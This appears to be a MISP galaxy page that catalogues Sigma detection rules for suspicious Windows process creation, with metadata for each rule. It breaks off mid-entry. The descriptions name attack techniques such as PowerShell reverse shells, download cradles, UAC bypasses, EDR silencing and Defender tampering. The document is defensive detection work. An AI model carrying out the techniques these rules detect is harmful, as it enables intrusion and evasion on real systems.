UUID dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45 which can be used as unique global reference for Windows Hotfix Updates Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_hotfix.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Potentially Suspicious WebDAV LNK Execution

Detects possible execution via LNK file accessed on a WebDAV server.

Internal MISP references

UUID 1412aa78-a24c-4abd-83df-767dfb2c5bbe which can be used as unique global reference for Potentially Suspicious WebDAV LNK Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski
creation_date 2023/08/21
falsepositive ['Unknown']
filename proc_creation_win_webdav_lnk_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.t1204']
Related clusters

To see the related clusters, click here.

Potential File Download Via MS-AppInstaller Protocol Handler

Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"

Internal MISP references

UUID 180c7c5c-d64b-4a63-86e9-68910451bc8b which can be used as unique global reference for Potential File Download Via MS-AppInstaller Protocol Handler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023/11/09
falsepositive ['Unknown']
filename proc_creation_win_susp_ms_appinstaller_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious FromBase64String Usage On Gzip Archive - Process Creation

Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.

Internal MISP references

UUID d75d6b6b-adb9-48f7-824b-ac2e786efe1f which can be used as unique global reference for Suspicious FromBase64String Usage On Gzip Archive - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/23
falsepositive ['Legitimate administrative script']
filename proc_creation_win_powershell_frombase64string_archive.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1132.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Tools Using ComputerDefaults

Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)

Internal MISP references

UUID 3c05e90d-7eba-4324-9972-5d7f711a60a8 which can be used as unique global reference for UAC Bypass Tools Using ComputerDefaults in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/31
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_computerdefaults.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Password Protected Compressed File Extraction Via 7Zip

Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.

Internal MISP references

UUID b717b8fd-6467-4d7d-b3d3-27f9a463af77 which can be used as unique global reference for Password Protected Compressed File Extraction Via 7Zip in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/10
falsepositive ['Legitimate activity is expected since extracting files with a password can be common in some environment.']
filename proc_creation_win_7zip_password_extraction.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

HackTool - Koadic Execution

Detects command line parameters used by Koadic hack tool

Internal MISP references

UUID 5cddf373-ef00-4112-ad72-960ac29bac34 which can be used as unique global reference for HackTool - Koadic Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author wagga, Jonhnathan Ribeiro, oscd.community
creation_date 2020/01/12
falsepositive ['Unknown']
filename proc_creation_win_hktl_koadic.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Always Install Elevated MSI Spawned Cmd And Powershell

Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"

Internal MISP references

UUID 1e53dd56-8d83-4eb4-a43e-b790a05510aa which can be used as unique global reference for Always Install Elevated MSI Spawned Cmd And Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename proc_creation_win_susp_elavated_msi_spawned_shell.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potentially Over Permissive Permissions Granted Using Dsacls.EXE

Detects usage of Dsacls to grant over permissive permissions

Internal MISP references

UUID 01c42d3c-242d-4655-85b2-34f1739632f7 which can be used as unique global reference for Potentially Over Permissive Permissions Granted Using Dsacls.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administrators granting over permissive permissions to users']
filename proc_creation_win_dsacls_abuse_permissions.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Shadow Copies Creation Using Operating Systems Utilities

Shadow Copies creation using operating systems utilities, possible credential access

Internal MISP references

UUID b17ea6f7-6e90-447e-a799-e6c0a493d6ce which can be used as unique global reference for Shadow Copies Creation Using Operating Systems Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/22
falsepositive ['Legitimate administrator working with shadow copies, access for backup purposes']
filename proc_creation_win_susp_shadow_copies_creation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1003.002', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Perl Inline Command Execution

Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.

Internal MISP references

UUID f426547a-e0f7-441a-b63e-854ac5bdf54d which can be used as unique global reference for Perl Inline Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Unknown']
filename proc_creation_win_perl_inline_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Obfuscated PowerShell Code

Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines

Internal MISP references

UUID 8d01b53f-456f-48ee-90f6-bc28e67d4e35 which can be used as unique global reference for Suspicious Obfuscated PowerShell Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/11
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_encoded_obfusc.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Remote Access Tool - GoToAssist Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID b6d98a4f-cef0-4abf-bbf6-24132854a83d which can be used as unique global reference for Remote Access Tool - GoToAssist Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_gotoopener.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Curl Web Request With Potential Custom User-Agent

Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings

Internal MISP references

UUID 85de1f22-d189-44e4-8239-dc276b45379b which can be used as unique global reference for Curl Web Request With Potential Custom User-Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_curl_custom_user_agent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Execution of Shutdown

Use of the commandline to shutdown or reboot windows

Internal MISP references

UUID 34ebb878-1b15-4895-b352-ca2eeb99b274 which can be used as unique global reference for Suspicious Execution of Shutdown in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_shutdown_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1529']
Related clusters

To see the related clusters, click here.

PUA - System Informer Execution

Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations

Internal MISP references

UUID 5722dff1-4bdd-4949-86ab-fbaf707e767a which can be used as unique global reference for PUA - System Informer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/08
falsepositive ['System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly']
filename proc_creation_win_pua_system_informer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.discovery', 'attack.defense_evasion', 'attack.t1082', 'attack.t1564', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Suspicious RunAs-Like Flag Combination

Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools

Internal MISP references

UUID 50d66fb0-03f8-4da0-8add-84e77d12a020 which can be used as unique global reference for Suspicious RunAs-Like Flag Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/11
falsepositive ['Unknown']
filename proc_creation_win_susp_privilege_escalation_cli_patterns.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation']

HackTool - EDRSilencer Execution

Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.

Internal MISP references

UUID eb2d07d4-49cb-4523-801a-da002df36602 which can be used as unique global reference for HackTool - EDRSilencer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2024/01/02
falsepositive ['Unlikely']
filename proc_creation_win_hktl_edrsilencer.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

PowerShell Web Download

Detects suspicious ways to download files or content using PowerShell

Internal MISP references

UUID 6e897651-f157-4d8f-aaeb-df8151488385 which can be used as unique global reference for PowerShell Web Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/24
falsepositive ['Scripts or tools that download files']
filename proc_creation_win_powershell_download_cradles.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.execution', 'attack.t1059.001', 'attack.t1105']
Related clusters

To see the related clusters, click here.

PUA - AdvancedRun Suspicious Execution

Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts

Internal MISP references

UUID fa00b701-44c6-4679-994d-5a18afa8a707 which can be used as unique global reference for PUA - AdvancedRun Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/20
falsepositive ['Unknown']
filename proc_creation_win_pua_advancedrun_priv_user.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

HackTool - TruffleSnout Execution

Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.

Internal MISP references

UUID 69ca006d-b9a9-47f5-80ff-ecd4d25d481a which can be used as unique global reference for HackTool - TruffleSnout Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Unknown']
filename proc_creation_win_hktl_trufflesnout.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1482']
Related clusters

To see the related clusters, click here.

Suspicious Use of PsLogList

Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs

Internal MISP references

UUID aae1243f-d8af-40d8-ab20-33fc6d0c55bc which can be used as unique global reference for Suspicious Use of PsLogList in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/18
falsepositive ['Another tool that uses the command line switches of PsLogList', 'Legitimate use of PsLogList by an administrator']
filename proc_creation_win_sysinternals_psloglist.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Potential Dropper Script Execution Via WScript/CScript

Detects wscript/cscript executions of scripts located in user directories

Internal MISP references

UUID cea72823-df4d-4567-950c-0b579eaf0846 which can be used as unique global reference for Potential Dropper Script Execution Via WScript/CScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Some installers might generate a similar behavior. An initial baseline is required']
filename proc_creation_win_wscript_cscript_dropper.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

New Service Creation Using Sc.EXE

Detects the creation of a new service using the "sc.exe" utility.

Internal MISP references

UUID 85ff530b-261d-48c6-a441-facaa2e81e48 which can be used as unique global reference for New Service Creation Using Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
creation_date 2023/02/20
falsepositive ['Legitimate administrator or user creates a service for legitimate reasons.', 'Software installation']
filename proc_creation_win_sc_create_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Non Interactive PowerShell Process Spawned

Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.

Internal MISP references

UUID f4bbd493-b796-416e-bbf2-121235348529 which can be used as unique global reference for Non Interactive PowerShell Process Spawned in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
creation_date 2019/09/12
falsepositive ['Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies']
filename proc_creation_win_powershell_non_interactive_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Execute Files with Msdeploy.exe

Detects file execution using the msdeploy.exe lolbin

Internal MISP references

UUID 646bc99f-6682-4b47-a73a-17b1b64c9d34 which can be used as unique global reference for Execute Files with Msdeploy.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2020/10/18
falsepositive ['System administrator Usage']
filename proc_creation_win_lolbin_msdeploy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

UAC Bypass Using PkgMgr and DISM

Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)

Internal MISP references

UUID a743ceba-c771-4d75-97eb-8a90f7f4844c which can be used as unique global reference for UAC Bypass Using PkgMgr and DISM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_pkgmgr_dism.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Lolbin Runexehelper Use As Proxy

Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs

Internal MISP references

UUID cd71385d-fd9b-4691-9b98-2b1f7e508714 which can be used as unique global reference for Lolbin Runexehelper Use As Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/29
falsepositive ['Unknown']
filename proc_creation_win_lolbin_runexehelper.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Dism Remove Online Package

Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Internal MISP references

UUID 43e32da2-fdd0-4156-90de-50dfd62636f9 which can be used as unique global reference for Dism Remove Online Package in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Legitimate script']
filename proc_creation_win_dsim_remove.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious File Download From File Sharing Domain Via Wget.EXE

Detects potentially suspicious file downloads from file sharing domains using wget.exe

Internal MISP references

UUID a0d7e4d2-bede-4141-8896-bc6e237e977c which can be used as unique global reference for Suspicious File Download From File Sharing Domain Via Wget.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unknown']
filename proc_creation_win_wget_download_susp_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Response File Execution Via Odbcconf.EXE

Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.

Internal MISP references

UUID 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 which can be used as unique global reference for Suspicious Response File Execution Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_response_file_susp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Potential Windows Defender Tampering Via Wmic.EXE

Detects potential tampering with Windows Defender settings such as adding exclusion using wmic

Internal MISP references

UUID 51cbac1e-eee3-4a90-b1b7-358efb81fa0a which can be used as unique global reference for Potential Windows Defender Tampering Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/11
falsepositive ['Unknown']
filename proc_creation_win_wmic_namespace_defender.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1546.008']
Related clusters

To see the related clusters, click here.

Hiding Files with Attrib.exe

Detects usage of attrib.exe to hide files from users.

Internal MISP references

UUID 4281cb20-2994-4580-aa63-c8b86d019934 which can be used as unique global reference for Hiding Files with Attrib.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sami Ruohonen
creation_date 2019/01/16
falsepositive ['IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)', 'Msiexec.exe hiding desktop.ini']
filename proc_creation_win_attrib_hiding_files.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Suspicious Reg Add BitLocker

Detects suspicious addition to BitLocker related registry keys via the reg.exe utility

Internal MISP references

UUID 0e0255bf-2548-47b8-9582-c0955c9283f5 which can be used as unique global reference for Suspicious Reg Add BitLocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/15
falsepositive ['Unlikely']
filename proc_creation_win_reg_bitlocker.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

Uncommon Child Process Of Appvlp.EXE

Detects uncommon child processes of Appvlp.EXE Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.

Internal MISP references

UUID 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 which can be used as unique global reference for Uncommon Child Process Of Appvlp.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/03/13
falsepositive ['Unknown']
filename proc_creation_win_appvlp_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218', 'attack.defense_evasion', 'attack.execution']
Related clusters

To see the related clusters, click here.

Potential Defense Evasion Via Right-to-Left Override

Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques.

Internal MISP references

UUID ad691d92-15f2-4181-9aa4-723c74f9ddc3 which can be used as unique global reference for Potential Defense Evasion Via Right-to-Left Override in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski, @micahbabinski
creation_date 2023/02/15
falsepositive ['Commandlines that contains scriptures such as arabic or hebrew might make use of this character']
filename proc_creation_win_susp_right_to_left_override.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.002']
Related clusters

To see the related clusters, click here.

Windows Processes Suspicious Parent Directory

Detect suspicious parent processes of well-known Windows processes

Internal MISP references

UUID 96036718-71cc-4027-a538-d1587e0006a7 which can be used as unique global reference for Windows Processes Suspicious Parent Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author vburov
creation_date 2019/02/23
falsepositive ['Some security products seem to spawn these']
filename proc_creation_win_susp_proc_wrong_parent.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

File In Suspicious Location Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations

Internal MISP references

UUID 82a6714f-4899-4f16-9c1e-9a333544d4c3 which can be used as unique global reference for File In Suspicious Location Encoded To Base64 Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_encode_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Redirection to Local Admin Share

Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers

Internal MISP references

UUID ab9e3b40-0c85-4ba1-aede-455d226fd124 which can be used as unique global reference for Suspicious Redirection to Local Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/16
falsepositive ['Unknown']
filename proc_creation_win_susp_redirect_local_admin_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

Renamed Mavinject.EXE Execution

Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag

Internal MISP references

UUID e6474a1b-5390-49cd-ab41-8d88655f7394 which can be used as unique global reference for Renamed Mavinject.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2022/12/05
falsepositive ['Unlikely']
filename proc_creation_win_renamed_mavinject.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055.001', 'attack.t1218.013']
Related clusters

To see the related clusters, click here.

Potential Powershell ReverseShell Connection

Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.

Internal MISP references

UUID edc2f8ae-2412-4dfd-b9d5-0c57727e70be which can be used as unique global reference for Potential Powershell ReverseShell Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/03/03
falsepositive ['In rare administrative cases, this function might be used to check network connectivity']
filename proc_creation_win_powershell_reverse_shell_connection.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

New Remote Desktop Connection Initiated Via Mstsc.EXE

Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID 954f0af7-62dd-418f-b3df-a84bc2c7a774 which can be used as unique global reference for New Remote Desktop Connection Initiated Via Mstsc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['WSL (Windows Sub System For Linux)']
filename proc_creation_win_mstsc_remote_connection.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.001']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 57bff678-25d1-4d6c-8211-8ca106d12053 which can be used as unique global reference for Remote Access Tool - ScreenConnect Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate usage of the tool']
filename proc_creation_win_remote_access_tools_screenconnect.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Suspicious Vsls-Agent Command With AgentExtensionPath Load

Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter

Internal MISP references

UUID 43103702-5886-11ed-9b6a-0242ac120002 which can be used as unique global reference for Suspicious Vsls-Agent Command With AgentExtensionPath Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author bohops
creation_date 2022/10/30
falsepositive ['False positives depend on custom use of vsls-agent.exe']
filename proc_creation_win_vslsagent_agentextensionpath_load.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Cmd.EXE Missing Space Characters Execution Anomaly

Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer).

Internal MISP references

UUID a16980c2-0c56-4de0-9a79-17971979efdd which can be used as unique global reference for Cmd.EXE Missing Space Characters Execution Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/23
falsepositive ['Unknown']
filename proc_creation_win_cmd_no_space_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious MSDT Parent Process

Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation

Internal MISP references

UUID 7a74da6b-ea76-47db-92cc-874ad90df734 which can be used as unique global reference for Suspicious MSDT Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nextron Systems
creation_date 2022/06/01
falsepositive ['Unknown']
filename proc_creation_win_msdt_susp_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential PowerShell Command Line Obfuscation

Detects the PowerShell command lines with special characters

Internal MISP references

UUID d7bcd677-645d-4691-a8d4-7a5602b780d1 which can be used as unique global reference for Potential PowerShell Command Line Obfuscation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
creation_date 2020/10/15
falsepositive ['Amazon SSM Document Worker', 'Windows Defender ATP']
filename proc_creation_win_powershell_cmdline_special_characters.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1027', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential Unquoted Service Path Reconnaissance Via Wmic.EXE

Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts

Internal MISP references

